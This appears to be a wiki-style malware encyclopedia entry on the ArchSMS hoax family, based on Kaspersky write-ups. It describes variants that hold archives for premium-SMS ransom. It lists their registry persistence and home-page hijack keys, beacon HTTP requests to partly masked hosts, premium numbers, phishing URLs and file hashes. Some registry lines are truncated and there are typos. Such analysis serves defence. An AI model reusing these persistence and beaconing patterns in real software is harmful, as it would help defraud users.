ArchSMS
Hoax.Win32.ArchSMS or ArchSMS is a hoax program that attempts to call premium rate numbers. It has multiple variants. ArchSMS.hewm This variant demands a ransom to retrieve contents from an encrypted archive. Once launched, it will create the following registry key: HKCU\Software\Stimul It will then display a "rules" window, through agreeing, it will ask for a location to unpack the archive into. After imitating the extracted sequence, it will attempt to call a premium number with the following text: 84***0191 It will also carry out the following HTTP request: GET /functions/sms-api/sms_from_soft.php?user_phone= 7&flow_id=1&platnik_id=0&num =2855&pt=1 HTTP/1.1 User-Agent: Mozilla/3.0 (compatible; Indy Library) Host: sti***ofit.com Cache-Control: no-cache The server responds with an interger, such as 123. Furthermore, the support page simply links to the following resource: http://vpoiske.sti***aball.com/support.php ArchSMS.pin This variant has similar behaviour to the previous variant. It will first create the following registry key: Explorer\Main "Default_Page_URL"="http://www.sm***xi.net" "Start Page"="http://www.sm***xi.net" Explorer\Main "Default_Page_URL"="http://www.sm***xi.net" "Start Page"="http://www.sm***xi.net" It will also create the following directory with the est string: %WorkDir%\xsendexe.tmp Like the other variant, it prevents a set of rules, and through agreeing it will allow you to unpack an archive. However, it will set a ransom for this archive, and it will also call the following numbers with the string 43***04 Austria 0930399999 Belgium 7796 Bulgaria 1098 Czech Republic 9090199 Germany 80888 Denmark 1945 Estonia 17013 Spain 5339 Finland 179479 France 83868 Hungary 90645045 Kyrgyzstan 1171 Lithuania 1645 Latvia 1874 Netherlands 7117 Norway 2322 Poland 7910 Portugal 68305 Sweden 72170 If the infected machine is situated in Urkraine, it will text the string 77***01 to the number 4161. Furthermore, it will send the following HTTP request GET /pass_request/?guid=3de9581b497e3ea0b9c822735a719b00 &parid=0&xnum= &xid=&nomer=+7m=zb&fn=&xtime= &lp= HTTP/1.1 Accept: */* Cache-Control: no-cache User-Agent: Opera 10 Host: wlnrar-auth4.net Connection: Keep-Alive ArchSMS.ong This variant will serve the same payload as all of the previous variants, with some differences. First it will rig your system to always run the hoax on startup. HKLM\Software\Microsoft\Windows\CurrentVersion\Run "winxrar" = """ autostart" It will then create the following registry keys: \InprocServer32 "(Default)" = "%System%\scrrun.dll" "ThreadingModel" = "Both" HKCR\CLSID\{7E0F3F10-7B69-8C21-EE01-70DABCF57934}\ProgID "(Default)" = "Scripting.FileSystemObject" HKCR\CLSID\{7E0F3F10-7B69-8C21-EE01-70DABCF57934}\TypeLib "(Default)" = "{420B2830-E718-11CF-893D-00A0C9054228}" HKCR\CLSID\{7E0F3F10-7B69-8C21-EE01-70DABCF57934}\Version "(Default)" = "1.0" HKLM\Software\Licenses "{I72A1C76714CAA996}" = "01 00 00 00" HKCU\Software\winxrar "exerunner" = "was" "runcounter" = After these two actions have been performed, it will hijack Internet Explorer, setting the home page to a certain website. In order to accomplish this, it will implant the following keys into the registry. Explorer\Main "Default_Page_URL" = "http://www.sm***xi.net" "Start Page" = "http://www.sm***xi.net" Explorer\Main "Default_Page_URL" = "http://www.sm***xi.net" "Start Page" = "http://www.sm***xi.net" Furthermore, it will write the string est to the %WorkDir%\xsendexe.tmp directory. Finally, it will retrieve elements from the following website: wlnr***th4.net ArchSMS.lty This variant uses elements from previous variants, sharing a very similar payload. It will first create the following registry key: HKLM\Software\StimulProfit It will display the "rules" window, where the user will naturally agree and unpack the file. It will then set a ransom for this archive. After this, it will send three SMS messages to premium numbers. Upon confirmation, it will send the following HTTP request. GET /functions/sms-api/sms_from_soft.php?user_phone=7&flow_id=0&platnik_id=7&num=3855&pt=1 HTTP/1.1Host: stimulprofit.comAccept: text/html, */*, text/xmlAccept-Encoding: identityUser-Agent: Stimulprfit Software In response it will generate an interger, example: 123. The SMS message rates are displayed on this site: http://sms***11.ru The Support link will link to the following website: http://for***e.in/support.php The application finally links to the following phishing resources. http://zaka***aysya.com http://vpoi***efiles.com http://zaka***ka-file.com http://deposi***adfiles.com http://rapida***dfiles.com http://google***files.com/ http://zaka***afile.com ArchSMS.mvr Compared to other variants, little is known about this particular variant. This hoax is downloaded from the Internet advertising as a self-extracting archive, containing the files they wish to retrieve. Once the rules have been agreed to, the archive may be "unpacked". The archive is then held for a ransom key. To obtain such code, they must send a text to a premium number. The "information for subscribers" links to the following page. http://help-cmc.ru/tarifs/ Sources *[https://securelist.social-kaspersky.com/en/descriptions/iframe/Hoax.Win32.ArchSMS.hewm Kaspersky Labs, (SecureList) *'Hewm variant'*] *[https://securelist.social-kaspersky.com/en/descriptions/iframe/Hoax.Win32.ArchSMS.pin Kaspersky Labs, (SecureList) *'Pin variant'*] *[https://securelist.social-kaspersky.com/en/descriptions/iframe/Hoax.Win32.ArchSMS.ong Kaspersky Labs, (SecureList) *'Ong variant'*] *[https://securelist.social-kaspersky.com/en/descriptions/iframe/Hoax.Win32.ArchSMS.lty Kaspersky Labs, (SecureList) *'lty variant'*] *[https://securelist.social-kaspersky.com/en/descriptions/iframe/Hoax.Win32.ArchSMS.mvr Kaspersky Labs, (SecureList) *'mvr variant'*] Technical Details ArchSMS.hewm MD5 What is this?: 13DB8201EA98EC0AB953AAB8111134FA SHA1 What is this?: 55A8FF534DCA8250E2B424775010516AD12B0ED1 ArchSMS.pin MD5 What is this?: Not available SHA1 What is this?: Not available ArchSMS.ong MD5 What is this?: 50886C55EFEB926FA5366AB97C8F6AFA SHA1 What is this?: 3B67AD4A1D95D8D1FFC27D3E105A36EA6CAB9C2C ArchSMS.lty MD5 What is this?: cc64ee29fdf3600a0d18be9a07f3bbb6 SHA1 What is this?: 573b780beffda7de9c7fa61826d7bb67aec0ceb8 ArchSMS.mvr MD5 What is this?: Not available SHA1 What is this?: Not available Category:Hoax Category:Win32 Category:Win32 hoax Category:Scam Category:Microsoft Windows